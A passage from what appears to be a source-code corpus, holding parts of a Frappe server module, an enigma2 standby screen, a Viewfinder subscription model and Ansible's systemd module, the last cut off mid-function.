http_status_code=http_status_code, indicator_color='red')
return_as_message = True
elif http_status_code==404:
frappe.respond_as_web_page(_("Not Found"),
_("The resource you are looking for is not available"),
http_status_code=http_status_code, indicator_color='red')
return_as_message = True
elif http_status_code == 429:
response = frappe.rate_limiter.respond()
else:
traceback = "<pre>" + sanitize_html(frappe.get_traceback()) + "</pre>"
# disable traceback in production if flag is set
if frappe.local.flags.disable_traceback and not frappe.local.dev_server:
traceback = ""
frappe.respond_as_web_page("Server Error",
traceback, http_status_code=http_status_code,
indicator_color='red', width=640)
return_as_message = True
if e.__class__ == frappe.AuthenticationError:
if hasattr(frappe.local, "login_manager"):
frappe.local.login_manager.clear_cookies()
if http_status_code >= 500:
make_error_snapshot(e)
if return_as_message:
response = frappe.website.render.render("message",
http_status_code=http_status_code)
return response
def after_request(rollback):
if (frappe.local.request.method in ("POST", "PUT") or frappe.local.flags.commit) and frappe.db:
if frappe.db.transaction_writes:
frappe.db.commit()
rollback = False
# update session
if getattr(frappe.local, "session_obj", None):
updated_in_db = frappe.local.session_obj.update()
if updated_in_db:
frappe.db.commit()
rollback = False
update_comments_in_parent_after_request()
return rollback
application = local_manager.make_middleware(application)
def serve(port=8000, profile=False, no_reload=False, no_threading=False, site=None, sites_path='.'):
global application, _site, _sites_path
_site = site
_sites_path = sites_path
from werkzeug.serving import run_simple
if profile:
application = ProfilerMiddleware(application, sort_by=('cumtime', 'calls'))
if not os.environ.get('NO_STATICS'):
application = SharedDataMiddleware(application, {
str('/assets'): str(os.path.join(sites_path, 'assets'))
})
application = StaticDataMiddleware(application, {
str('/files'): str(os.path.abspath(sites_path))
})
application.debug = True
application.config = {
'SERVER_NAME': 'localhost:8000'
}
log = logging.getLogger('werkzeug')
log.propagate = False
in_test_env = os.environ.get('CI')
if in_test_env:
log.setLevel(logging.ERROR)
run_simple('0.0.0.0', int(port), application,
use_reloader=False if in_test_env else not no_reload,
use_debugger=not in_test_env,
use_evalex=not in_test_env,
threaded=not no_threading)
| mit | -1,566,488,549,490,101,500 | 28.830882 | 128 | 0.726769 | false |
OpenPLi/enigma2 | lib/python/Screens/Standby.py | 2 | 14247 | import os
import RecordTimer
import Components.ParentalControl
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Components.ActionMap import ActionMap
from Components.config import config
from Components.AVSwitch import AVSwitch
from Components.Console import Console
from Components.ImportChannels import ImportChannels
from Components.SystemInfo import SystemInfo
from Components.Sources.StreamService import StreamServiceList
from Components.Task import job_manager
from Tools.Directories import mediafilesInUse
from Tools import Notifications
from time import time, localtime
from GlobalActions import globalActionMap
from enigma import eDVBVolumecontrol, eTimer, eDVBLocalTimeHandler, eServiceReference, eStreamServer, quitMainloop, iRecordableService
inStandby = None
infoBarInstance = None
QUIT_SHUTDOWN = 1
QUIT_REBOOT = 2
QUIT_RESTART = 3
QUIT_UPGRADE_FP = 4
QUIT_ERROR_RESTART = 5
QUIT_DEBUG_RESTART = 6
QUIT_MANUFACTURER_RESET = 7
QUIT_MAINT = 16
QUIT_UPGRADE_PROGRAM = 42
QUIT_IMAGE_RESTORE = 43
def isInfoBarInstance():
global infoBarInstance
if infoBarInstance is None:
from Screens.InfoBar import InfoBar
if InfoBar.instance:
infoBarInstance = InfoBar.instance
return infoBarInstance
def checkTimeshiftRunning():
infobar_instance = isInfoBarInstance()
return config.usage.check_timeshift.value and infobar_instance and infobar_instance.timeshiftEnabled() and infobar_instance.timeshift_was_activated
class StandbyScreen(Screen):
def __init__(self, session, StandbyCounterIncrease=True):
self.skinName = "Standby"
Screen.__init__(self, session)
self.avswitch = AVSwitch()
print "[Standby] enter standby"
if os.path.exists("/usr/script/standby_enter.sh"):
Console().ePopen("/usr/script/standby_enter.sh")
self["actions"] = ActionMap(["StandbyActions"],
{
"power": self.Power,
"discrete_on": self.Power
}, -1)
globalActionMap.setEnabled(False)
self.infoBarInstance = isInfoBarInstance()
from Screens.SleepTimerEdit import isNextWakeupTime
self.StandbyCounterIncrease = StandbyCounterIncrease
self.standbyTimeoutTimer = eTimer()
self.standbyTimeoutTimer.callback.append(self.standbyTimeout)
self.standbyStopServiceTimer = eTimer()
self.standbyStopServiceTimer.callback.append(self.stopService)
self.standbyWakeupTimer = eTimer()
self.standbyWakeupTimer.callback.append(self.standbyWakeup)
self.timeHandler = None
self.setMute()
self.paused_service = self.paused_action = False
self.prev_running_service = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if Components.ParentalControl.parentalControl.isProtected(self.prev_running_service):
self.prev_running_service = eServiceReference(config.tv.lastservice.value)
service = self.prev_running_service and self.prev_running_service.toString()
if service:
if service.rsplit(":", 1)[1].startswith("/"):
self.paused_service = hasattr(self.session.current_dialog, "pauseService") and hasattr(self.session.current_dialog, "unPauseService") and self.session.current_dialog or self.infoBarInstance
self.paused_action = hasattr(self.paused_service, "seekstate") and hasattr(self.paused_service, "SEEK_STATE_PLAY") and self.paused_service.seekstate == self.paused_service.SEEK_STATE_PLAY
self.paused_action and self.paused_service.pauseService()
if not self.paused_service:
self.timeHandler = eDVBLocalTimeHandler.getInstance()
if self.timeHandler.ready():
if self.session.nav.getCurrentlyPlayingServiceOrGroup():
self.stopService()
else:
self.standbyStopServiceTimer.startLongTimer(5)
self.timeHandler = None
else:
self.timeHandler.m_timeUpdated.get().append(self.stopService)
if self.session.pipshown:
self.infoBarInstance and hasattr(self.infoBarInstance, "showPiP") and self.infoBarInstance.showPiP()
if SystemInfo["ScartSwitch"]:
self.avswitch.setInput("SCART")
else:
self.avswitch.setInput("AUX")
gotoShutdownTime = int(config.usage.standby_to_shutdown_timer.value)
if gotoShutdownTime:
self.standbyTimeoutTimer.startLongTimer(gotoShutdownTime)
if self.StandbyCounterIncrease is not 1:
gotoWakeupTime = isNextWakeupTime(True)
if gotoWakeupTime != -1:
curtime = localtime(time())
if curtime.tm_year > 1970:
wakeup_time = int(gotoWakeupTime - time())
if wakeup_time > 0:
self.standbyWakeupTimer.startLongTimer(wakeup_time)
self.onFirstExecBegin.append(self.__onFirstExecBegin)
self.onClose.append(self.__onClose)
def __onClose(self):
global inStandby
inStandby = None
self.standbyTimeoutTimer.stop()
self.standbyStopServiceTimer.stop()
self.standbyWakeupTimer.stop()
self.timeHandler and self.timeHandler.m_timeUpdated.get().remove(self.stopService)
if self.paused_service:
self.paused_action and self.paused_service.unPauseService()
elif self.prev_running_service:
service = self.prev_running_service.toString()
if config.servicelist.startupservice_onstandby.value:
self.session.nav.playService(eServiceReference(config.servicelist.startupservice.value))
self.infoBarInstance and self.infoBarInstance.servicelist.correctChannelNumber()
else:
self.session.nav.playService(self.prev_running_service)
self.session.screen["Standby"].boolean = False
globalActionMap.setEnabled(True)
if RecordTimer.RecordTimerEntry.receiveRecordEvents:
RecordTimer.RecordTimerEntry.stopTryQuitMainloop()
self.avswitch.setInput("ENCODER")
self.leaveMute()
if os.path.exists("/usr/script/standby_leave.sh"):
Console().ePopen("/usr/script/standby_leave.sh")
if config.usage.remote_fallback_import_standby.value:
ImportChannels()
def __onFirstExecBegin(self):
global inStandby
inStandby = self
self.session.screen["Standby"].boolean = True
if self.StandbyCounterIncrease:
config.misc.standbyCounter.value += 1
def Power(self):
print "[Standby] leave standby"
self.close(True)
def setMute(self):
self.wasMuted = eDVBVolumecontrol.getInstance().isMuted()
if not self.wasMuted:
eDVBVolumecontrol.getInstance().volumeMute()
def leaveMute(self):
if not self.wasMuted:
eDVBVolumecontrol.getInstance().volumeUnMute()
def stopService(self):
self.prev_running_service = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if Components.ParentalControl.parentalControl.isProtected(self.prev_running_service):
self.prev_running_service = eServiceReference(config.tv.lastservice.value)
self.session.nav.stopService()
def standbyTimeout(self):
if config.usage.standby_to_shutdown_timer_blocktime.value:
curtime = localtime(time())
if curtime.tm_year > 1970: #check if the current time is valid
curtime = (curtime.tm_hour, curtime.tm_min, curtime.tm_sec)
begintime = tuple(config.usage.standby_to_shutdown_timer_blocktime_begin.value)
endtime = tuple(config.usage.standby_to_shutdown_timer_blocktime_end.value)
if begintime <= endtime and (curtime >= begintime and curtime < endtime) or begintime > endtime and (curtime >= begintime or curtime < endtime):
duration = (endtime[0] * 3600 + endtime[1] * 60) - (curtime[0] * 3600 + curtime[1] * 60 + curtime[2])
if duration:
if duration < 0:
duration += 24 * 3600
self.standbyTimeoutTimer.startLongTimer(duration)
return
if self.session.screen["TunerInfo"].tuner_use_mask or mediafilesInUse(self.session):
self.standbyTimeoutTimer.startLongTimer(600)
else:
RecordTimer.RecordTimerEntry.TryQuitMainloop()
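	# --- Editor's illustrative sketch (not part of the original module) ---
	# Example of the block-time handling in standbyTimeout() above, with
	# assumed settings: block begins 23:00, ends 06:00, current time 01:30.
	#   begintime > endtime, and curtime < endtime  -> inside the block window
	#   duration = 6*3600 - (1*3600 + 30*60 + 0) = 16200 s (about 4.5 h)
	# so the shutdown check is simply re-armed to run again when the window ends.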
def standbyWakeup(self):
self.Power()
def createSummary(self):
return StandbySummary
class Standby(StandbyScreen):
def __init__(self, session, StandbyCounterIncrease=True):
if checkTimeshiftRunning():
self.skin = """<screen position="0,0" size="0,0"/>"""
Screen.__init__(self, session)
self.infoBarInstance = isInfoBarInstance()
self.StandbyCounterIncrease = StandbyCounterIncrease
self.onFirstExecBegin.append(self.showCheckTimeshiftRunning)
self.onHide.append(self.close)
else:
StandbyScreen.__init__(self, session, StandbyCounterIncrease)
def showCheckTimeshiftRunning(self):
self.infoBarInstance.checkTimeshiftRunning(self.showCheckTimeshiftRunningCallback, timeout=20)
def showCheckTimeshiftRunningCallback(self, answer=False):
if answer:
self.onClose.append(self.goStandby)
def goStandby(self):
Notifications.AddNotification(StandbyScreen, self.StandbyCounterIncrease)
class StandbySummary(Screen):
skin = """
<screen position="0,0" size="132,64">
<widget source="global.CurrentTime" render="Label" position="0,0" size="132,64" font="Regular;40" halign="center">
<convert type="ClockToText" />
</widget>
<widget source="session.RecordState" render="FixedLabel" text=" " position="0,0" size="132,64" zPosition="1" >
<convert type="ConfigEntryTest">config.usage.blinking_display_clock_during_recording,True,CheckSourceBoolean</convert>
<convert type="ConditionalShowHide">Blink</convert>
</widget>
</screen>"""
class QuitMainloopScreen(Screen):
def __init__(self, session, retvalue=QUIT_SHUTDOWN):
self.skin = """<screen name="QuitMainloopScreen" position="fill" flags="wfNoBorder">
<ePixmap pixmap="icons/input_info.png" position="c-27,c-60" size="53,53" alphatest="on" />
<widget name="text" position="center,c+5" size="720,100" font="Regular;22" halign="center" />
</screen>"""
Screen.__init__(self, session)
from Components.Label import Label
text = {
QUIT_SHUTDOWN: _("Your receiver is shutting down"),
QUIT_REBOOT: _("Your receiver is rebooting"),
QUIT_RESTART: _("The user interface of your receiver is restarting"),
QUIT_UPGRADE_FP: _("Your frontprocessor will be updated\nPlease wait until your receiver reboots\nThis may take a few minutes"),
QUIT_DEBUG_RESTART: _("The user interface of your receiver is restarting in debug mode"),
QUIT_UPGRADE_PROGRAM: _("Unattended update in progress\nPlease wait until your receiver reboots\nThis may take a few minutes"),
QUIT_MANUFACTURER_RESET: _("Manufacturer reset in progress\nPlease wait until enigma2 restarts")
}.get(retvalue)
self["text"] = Label(text)
inTryQuitMainloop = False
def getReasons(session, retvalue=QUIT_SHUTDOWN):
recordings = session.nav.getRecordings()
jobs = len(job_manager.getPendingJobs())
reasons = []
next_rec_time = -1
if not recordings:
next_rec_time = session.nav.RecordTimer.getNextRecordingTime()
if recordings or (next_rec_time > 0 and (next_rec_time - time()) < 360):
reasons.append(_("Recording(s) are in progress or coming up in few seconds!"))
if jobs:
if jobs == 1:
job = job_manager.getPendingJobs()[0]
reasons.append("%s: %s (%d%%)" % (job.getStatustext(), job.name, int(100 * job.progress / float(job.end))))
else:
reasons.append((ngettext("%d job is running in the background!", "%d jobs are running in the background!", jobs) % jobs))
if checkTimeshiftRunning():
reasons.append(_("You seem to be in timeshift!"))
if eStreamServer.getInstance().getConnectedClients() or StreamServiceList:
reasons.append(_("Client is streaming from this box!"))
if not reasons and mediafilesInUse(session) and retvalue in (QUIT_SHUTDOWN, QUIT_REBOOT, QUIT_UPGRADE_FP, QUIT_UPGRADE_PROGRAM):
reasons.append(_("A file from media is in use!"))
return "\n".join(reasons)
class TryQuitMainloop(MessageBox):
def __init__(self, session, retvalue=QUIT_SHUTDOWN, timeout=-1, default_yes=False, check_reasons=True):
self.retval = retvalue
self.connected = False
reason = check_reasons and getReasons(session, retvalue)
if reason:
text = {
QUIT_SHUTDOWN: _("Really shutdown now?"),
QUIT_REBOOT: _("Really reboot now?"),
QUIT_RESTART: _("Really restart now?"),
QUIT_UPGRADE_FP: _("Really update the frontprocessor and reboot now?"),
QUIT_DEBUG_RESTART: _("Really restart in debug mode now?"),
QUIT_UPGRADE_PROGRAM: _("Really update your settop box and reboot now?"),
QUIT_MANUFACTURER_RESET: _("Really perform a manufacturer reset now?")
}.get(retvalue, None)
if text:
MessageBox.__init__(self, session, "%s\n%s" % (reason, text), type=MessageBox.TYPE_YESNO, timeout=timeout, default=default_yes)
self.skinName = "MessageBoxSimple"
session.nav.record_event.append(self.getRecordEvent)
self.connected = True
self.onShow.append(self.__onShow)
self.onHide.append(self.__onHide)
return
self.skin = """<screen position="0,0" size="0,0"/>"""
Screen.__init__(self, session)
self.close(True)
def getRecordEvent(self, recservice, event):
if event == iRecordableService.evEnd:
recordings = self.session.nav.getRecordings()
if not recordings: # no more recordings exist
rec_time = self.session.nav.RecordTimer.getNextRecordingTime()
if rec_time > 0 and (rec_time - time()) < 360:
self.initTimeout(360) # wait for next starting timer
self.startTimer()
else:
self.close(True) # immediate shutdown
elif event == iRecordableService.evStart:
self.stopTimer()
def close(self, value):
if self.connected:
self.connected = False
self.session.nav.record_event.remove(self.getRecordEvent)
if value:
self.hide()
if self.retval == QUIT_SHUTDOWN:
config.misc.DeepStandby.value = True
if not inStandby:
if os.path.exists("/usr/script/standby_enter.sh"):
Console().ePopen("/usr/script/standby_enter.sh")
if SystemInfo["HasHDMI-CEC"] and config.hdmicec.enabled.value and config.hdmicec.control_tv_standby.value and config.hdmicec.next_boxes_detect.value:
import Components.HdmiCec
Components.HdmiCec.hdmi_cec.secondBoxActive()
self.delay = eTimer()
self.delay.timeout.callback.append(self.quitMainloop)
self.delay.start(1500, True)
return
elif not inStandby:
config.misc.RestartUI.value = True
config.misc.RestartUI.save()
self.quitMainloop()
else:
MessageBox.close(self, True)
def quitMainloop(self):
self.session.nav.stopService()
self.quitScreen = self.session.instantiateDialog(QuitMainloopScreen, retvalue=self.retval)
self.quitScreen.show()
quitMainloop(self.retval)
def __onShow(self):
global inTryQuitMainloop
inTryQuitMainloop = True
def __onHide(self):
global inTryQuitMainloop
inTryQuitMainloop = False
| gpl-2.0 | 2,006,730,632,789,092,900 | 37.92623 | 193 | 0.747245 | false |
jiangzhonghui/viewfinder | backend/db/subscription.py | 13 | 6249 | # Copyright 2012 Viewfinder Inc. All Rights Reserved
"""User subscription table.
A subscription is any time-limited modification to a user's privileges,
such as increased storage quota. Subscriptions may be paid (initially
supporting iOS in-app purchases) or granted for other reasons such as
referring new users.
"""
__author__ = '[email protected] (Ben Darnell)'
from copy import deepcopy
import time
from viewfinder.backend.base import util
from viewfinder.backend.db import vf_schema
from viewfinder.backend.db.base import DBObject
from viewfinder.backend.db.range_base import DBRangeObject
from viewfinder.backend.op.notification_manager import NotificationManager
from viewfinder.backend.services import itunes_store
kITunesPrefix = 'itunes:'
@DBObject.map_table_attributes
class Subscription(DBRangeObject):
"""User subscription data object."""
__slots__ = []
_table = DBObject._schema.GetTable(vf_schema.SUBSCRIPTION)
# Since our subscriptions are a combination of storage quotas and
# feature access, give each one its own product type for now.
_ITUNES_PRODUCTS = {
# vf_sub1 = "Viewfinder Plus" - cloud storage option and 5GB
'vf_sub1': dict(product_type='vf_sub1', quantity=5),
# vf_sub2 = "Viewfinder Pro" - cloud storage, store originals, and 50GB
'vf_sub2': dict(product_type='vf_sub2', quantity=50),
}
_JSON_ATTRIBUTES = set(['transaction_id', 'subscription_id', 'timestamp', 'expiration_ts', 'product_type',
'quantity', 'payment_type'])
"""Subset of subscription attributes that are returned to the owning user in query_users."""
@classmethod
def _GetITunesProductInfo(cls, verify_response):
"""Maps iTunes product names to Subscription attributes.
An iTunes "product" also includes information about the billing
cycle; by convention we name our products with a suffix of "_month"
or "_year" (etc).
"""
product_id = verify_response.GetProductId()
base_product, billing_cycle = product_id.rsplit('_', 1)
assert billing_cycle in ('month', 'year'), billing_cycle
return Subscription._ITUNES_PRODUCTS[base_product]
@classmethod
def GetITunesTransactionId(cls, verify_response):
"""Returns the transaction id for an iTunes transaction.
The returned id is usable as a range key for Subscription.Query.
"""
return kITunesPrefix + verify_response.GetRenewalTransactionId()
@classmethod
def GetITunesSubscriptionId(cls, verify_response):
"""Returns the subscription id for an iTunes transaction.
The returned id will be the same for all transactions in a series of renewals.
"""
return kITunesPrefix + verify_response.GetOriginalTransactionId()
@classmethod
def CreateFromITunes(cls, user_id, verify_response):
"""Creates a subscription object for an iTunes transaction.
The verify_response argument is a response from
viewfinder.backend.services.itunes_store.ITunesStoreClient.VerifyReceipt.
The new object is returned but not saved to the database.
"""
assert verify_response.IsValid()
sub_dict = dict(
user_id=user_id,
transaction_id=Subscription.GetITunesTransactionId(verify_response),
subscription_id=Subscription.GetITunesSubscriptionId(verify_response),
timestamp=verify_response.GetTransactionTime(),
expiration_ts=verify_response.GetExpirationTime(),
payment_type='itunes',
extra_info=verify_response.GetLatestReceiptInfo(),
renewal_data=verify_response.GetRenewalData(),
)
sub_dict.update(**Subscription._GetITunesProductInfo(verify_response))
sub = Subscription.CreateFromKeywords(**sub_dict)
return sub
@classmethod
def RecordITunesTransaction(cls, client, callback, user_id, verify_response):
"""Creates a subscription record for an iTunes transaction and saves it to the database.
The verify_response argument is a response from
viewfinder.backend.services.itunes_store.ITunesStoreClient.VerifyReceipt.
"""
sub = Subscription.CreateFromITunes(user_id, verify_response)
sub.Update(client, callback)
@classmethod
def RecordITunesTransactionOperation(cls, client, callback, user_id, verify_response_str):
def _OnRecord():
NotificationManager.NotifyRecordSubscription(client, user_id, callback=callback)
verify_response = itunes_store.VerifyResponse.FromString(verify_response_str)
assert verify_response.IsValid()
Subscription.RecordITunesTransaction(client, _OnRecord, user_id, verify_response)
@classmethod
def QueryByUser(cls, client, callback, user_id, include_expired=False,
include_history=False):
"""Returns a list of Subscription objects for the given user.
By default only includes currently-active subscriptions, and only
one transaction per subscription. To return expired subscriptions,
pass include_expired=True. To return all transactions (even those
superseded by a renewal transaction for the same subscription),
pass include_history=True (which implies include_expired=True).
"""
history_results = []
latest = {}
def _VisitSub(sub, callback):
if include_history:
history_results.append(sub)
else:
if sub.expiration_ts < time.time() and not include_expired:
callback()
return
# Only one transaction per subscription.
if (sub.subscription_id in latest and
latest[sub.subscription_id].timestamp > sub.timestamp):
callback()
return
latest[sub.subscription_id] = sub
callback()
def _OnVisitDone():
if include_history:
assert not latest
callback(history_results)
else:
assert not history_results
callback(latest.values())
Subscription.VisitRange(client, user_id, None, None, _VisitSub, _OnVisitDone)
def MakeMetadataDict(self):
"""Project a subset of subscription attributes that can be provided to the user."""
sub_dict = {}
for attr_name in Subscription._JSON_ATTRIBUTES:
util.SetIfNotNone(sub_dict, attr_name, getattr(self, attr_name, None))
if self.extra_info:
sub_dict['extra_info'] = deepcopy(self.extra_info)
return sub_dict
| apache-2.0 | 2,398,161,972,583,370,000 | 37.574074 | 108 | 0.720595 | false |
emersonsoftware/ansiblefork | lib/ansible/modules/system/systemd.py | 5 | 16377 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Brian Coca <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'core',
'version': '1.0'}
DOCUMENTATION = '''
module: systemd
author:
- "Ansible Core Team"
version_added: "2.2"
short_description: Manage services.
description:
- Controls systemd services on remote hosts.
options:
name:
required: true
description:
- Name of the service.
aliases: ['unit', 'service']
state:
required: false
default: null
choices: [ 'started', 'stopped', 'restarted', 'reloaded' ]
description:
- C(started)/C(stopped) are idempotent actions that will not run commands unless necessary.
C(restarted) will always bounce the service. C(reloaded) will always reload.
enabled:
required: false
choices: [ "yes", "no" ]
default: null
description:
- Whether the service should start on boot. B(At least one of state and enabled is required.)
masked:
required: false
choices: [ "yes", "no" ]
default: null
description:
- Whether the unit should be masked or not, a masked unit is impossible to start.
daemon_reload:
required: false
default: no
choices: [ "yes", "no" ]
description:
- run daemon-reload before doing any other operations, to make sure systemd has read any changes.
aliases: ['daemon-reload']
user:
required: false
default: no
choices: [ "yes", "no" ]
description:
- run systemctl talking to the service manager of the calling user, rather than the service manager
of the system.
no_block:
required: false
default: no
choices: [ "yes", "no" ]
description:
- Do not synchronously wait for the requested operation to finish.
Enqueued job will continue without Ansible blocking on its completion.
version_added: "2.3"
notes:
- One option other than name is required.
requirements:
- A system managed by systemd
'''
EXAMPLES = '''
# Example action to start service httpd, if not running
- systemd: state=started name=httpd
# Example action to stop service cron on debian, if running
- systemd: name=cron state=stopped
# Example action to restart service cron on centos, in all cases, also issue daemon-reload to pick up config changes
- systemd:
state: restarted
daemon_reload: yes
name: crond
# Example action to reload service httpd, in all cases
- systemd:
name: httpd
state: reloaded
# Example action to enable service httpd and ensure it is not masked
- systemd:
name: httpd
enabled: yes
masked: no
# Example action to enable a timer for dnf-automatic
- systemd:
name: dnf-automatic.timer
state: started
enabled: True
'''
RETURN = '''
status:
description: A dictionary with the key=value pairs returned from `systemctl show`
returned: success
type: complex
sample: {
"ActiveEnterTimestamp": "Sun 2016-05-15 18:28:49 EDT",
"ActiveEnterTimestampMonotonic": "8135942",
"ActiveExitTimestampMonotonic": "0",
"ActiveState": "active",
"After": "auditd.service systemd-user-sessions.service time-sync.target systemd-journald.socket basic.target system.slice",
"AllowIsolate": "no",
"Before": "shutdown.target multi-user.target",
"BlockIOAccounting": "no",
"BlockIOWeight": "1000",
"CPUAccounting": "no",
"CPUSchedulingPolicy": "0",
"CPUSchedulingPriority": "0",
"CPUSchedulingResetOnFork": "no",
"CPUShares": "1024",
"CanIsolate": "no",
"CanReload": "yes",
"CanStart": "yes",
"CanStop": "yes",
"CapabilityBoundingSet": "18446744073709551615",
"ConditionResult": "yes",
"ConditionTimestamp": "Sun 2016-05-15 18:28:49 EDT",
"ConditionTimestampMonotonic": "7902742",
"Conflicts": "shutdown.target",
"ControlGroup": "/system.slice/crond.service",
"ControlPID": "0",
"DefaultDependencies": "yes",
"Delegate": "no",
"Description": "Command Scheduler",
"DevicePolicy": "auto",
"EnvironmentFile": "/etc/sysconfig/crond (ignore_errors=no)",
"ExecMainCode": "0",
"ExecMainExitTimestampMonotonic": "0",
"ExecMainPID": "595",
"ExecMainStartTimestamp": "Sun 2016-05-15 18:28:49 EDT",
"ExecMainStartTimestampMonotonic": "8134990",
"ExecMainStatus": "0",
"ExecReload": "{ path=/bin/kill ; argv[]=/bin/kill -HUP $MAINPID ; ignore_errors=no ; start_time=[n/a] ; stop_time=[n/a] ; pid=0 ; code=(null) ; status=0/0 }",
"ExecStart": "{ path=/usr/sbin/crond ; argv[]=/usr/sbin/crond -n $CRONDARGS ; ignore_errors=no ; start_time=[n/a] ; stop_time=[n/a] ; pid=0 ; code=(null) ; status=0/0 }",
"FragmentPath": "/usr/lib/systemd/system/crond.service",
"GuessMainPID": "yes",
"IOScheduling": "0",
"Id": "crond.service",
"IgnoreOnIsolate": "no",
"IgnoreOnSnapshot": "no",
"IgnoreSIGPIPE": "yes",
"InactiveEnterTimestampMonotonic": "0",
"InactiveExitTimestamp": "Sun 2016-05-15 18:28:49 EDT",
"InactiveExitTimestampMonotonic": "8135942",
"JobTimeoutUSec": "0",
"KillMode": "process",
"KillSignal": "15",
"LimitAS": "18446744073709551615",
"LimitCORE": "18446744073709551615",
"LimitCPU": "18446744073709551615",
"LimitDATA": "18446744073709551615",
"LimitFSIZE": "18446744073709551615",
"LimitLOCKS": "18446744073709551615",
"LimitMEMLOCK": "65536",
"LimitMSGQUEUE": "819200",
"LimitNICE": "0",
"LimitNOFILE": "4096",
"LimitNPROC": "3902",
"LimitRSS": "18446744073709551615",
"LimitRTPRIO": "0",
"LimitRTTIME": "18446744073709551615",
"LimitSIGPENDING": "3902",
"LimitSTACK": "18446744073709551615",
"LoadState": "loaded",
"MainPID": "595",
"MemoryAccounting": "no",
"MemoryLimit": "18446744073709551615",
"MountFlags": "0",
"Names": "crond.service",
"NeedDaemonReload": "no",
"Nice": "0",
"NoNewPrivileges": "no",
"NonBlocking": "no",
"NotifyAccess": "none",
"OOMScoreAdjust": "0",
"OnFailureIsolate": "no",
"PermissionsStartOnly": "no",
"PrivateNetwork": "no",
"PrivateTmp": "no",
"RefuseManualStart": "no",
"RefuseManualStop": "no",
"RemainAfterExit": "no",
"Requires": "basic.target",
"Restart": "no",
"RestartUSec": "100ms",
"Result": "success",
"RootDirectoryStartOnly": "no",
"SameProcessGroup": "no",
"SecureBits": "0",
"SendSIGHUP": "no",
"SendSIGKILL": "yes",
"Slice": "system.slice",
"StandardError": "inherit",
"StandardInput": "null",
"StandardOutput": "journal",
"StartLimitAction": "none",
"StartLimitBurst": "5",
"StartLimitInterval": "10000000",
"StatusErrno": "0",
"StopWhenUnneeded": "no",
"SubState": "running",
"SyslogLevelPrefix": "yes",
"SyslogPriority": "30",
"TTYReset": "no",
"TTYVHangup": "no",
"TTYVTDisallocate": "no",
"TimeoutStartUSec": "1min 30s",
"TimeoutStopUSec": "1min 30s",
"TimerSlackNSec": "50000",
"Transient": "no",
"Type": "simple",
"UMask": "0022",
"UnitFileState": "enabled",
"WantedBy": "multi-user.target",
"Wants": "system.slice",
"WatchdogTimestampMonotonic": "0",
"WatchdogUSec": "0",
}
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.service import sysv_exists, sysv_is_enabled, fail_if_missing
from ansible.module_utils._text import to_native
def is_running_service(service_status):
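# A unit that is still 'activating' counts as running, so it will not be started again.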
return service_status['ActiveState'] in set(['active', 'activating'])
# ===========================================
# Main control flow
def main():
# initialize
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True, type='str', aliases=['unit', 'service']),
state = dict(choices=[ 'started', 'stopped', 'restarted', 'reloaded'], type='str'),
enabled = dict(type='bool'),
masked = dict(type='bool'),
daemon_reload = dict(type='bool', default=False, aliases=['daemon-reload']),
user = dict(type='bool', default=False),
no_block = dict(type='bool', default=False),
),
supports_check_mode=True,
required_one_of=[['state', 'enabled', 'masked', 'daemon_reload']],
)
systemctl = module.get_bin_path('systemctl')
if module.params['user']:
systemctl = systemctl + " --user"
if module.params['no_block']:
systemctl = systemctl + " --no-block"
unit = module.params['name']
rc = 0
out = err = ''
result = {
'name': unit,
'changed': False,
'status': {},
'warnings': [],
}
# Run daemon-reload first, if requested
if module.params['daemon_reload']:
(rc, out, err) = module.run_command("%s daemon-reload" % (systemctl))
if rc != 0:
module.fail_json(msg='failure %d during daemon-reload: %s' % (rc, err))
found = False
is_initd = sysv_exists(unit)
is_systemd = False
# check service data, cannot error out on rc as it changes across versions, assume not found
(rc, out, err) = module.run_command("%s show '%s'" % (systemctl, unit))
if rc == 0:
# load return of systemctl show into dictionary for easy access and return
multival = []
if out:
k = None
for line in to_native(out).split('\n'): # systemd can have multiline values delimited with {}
if line.strip():
if k is None:
if '=' in line:
k,v = line.split('=', 1)
if v.lstrip().startswith('{'):
if not v.rstrip().endswith('}'):
multival.append(line)
continue
result['status'][k] = v.strip()
k = None
else:
if line.rstrip().endswith('}'):
result['status'][k] = '\n'.join(multival).strip()
multival = []
k = None
else:
multival.append(line)
is_systemd = 'LoadState' in result['status'] and result['status']['LoadState'] != 'not-found'
# Check for loading error
if is_systemd and 'LoadError' in result['status']:
module.fail_json(msg="Error loading unit file '%s': %s" % (unit, result['status']['LoadError']))
# Does service exist?
found = is_systemd or is_initd
if is_initd and not is_systemd:
result['warnings'].append('The service (%s) is actually an init script but the system is managed by systemd' % unit)
# mask/unmask the service, if requested, can operate on services before they are installed
if module.params['masked'] is not None:
# state is not masked unless systemd affirms otherwise
masked = ('LoadState' in result['status'] and result['status']['LoadState'] == 'masked')
if masked != module.params['masked']:
result['changed'] = True
if module.params['masked']:
action = 'mask'
else:
action = 'unmask'
if not module.check_mode:
(rc, out, err) = module.run_command("%s %s '%s'" % (systemctl, action, unit))
if rc != 0:
# some versions of systemd CAN mask/unmask non-existing services; we only fail on missing if they don't
fail_if_missing(module, found, unit, msg='host')
# Enable/disable service startup at boot if requested
if module.params['enabled'] is not None:
if module.params['enabled']:
action = 'enable'
else:
action = 'disable'
fail_if_missing(module, found, unit, msg='host')
# do we need to enable the service?
enabled = False
(rc, out, err) = module.run_command("%s is-enabled '%s'" % (systemctl, unit))
# check systemctl result or if it is a init script
if rc == 0:
enabled = True
elif rc == 1:
# if not a user service and both init script and unit file exist stdout should have enabled/disabled, otherwise use rc entries
if not module.params['user'] and \
is_initd and \
(not out.strip().endswith('disabled') or sysv_is_enabled(unit)):
enabled = True
# default to current state
result['enabled'] = enabled
# Change enable/disable if needed
if enabled != module.params['enabled']:
result['changed'] = True
if not module.check_mode:
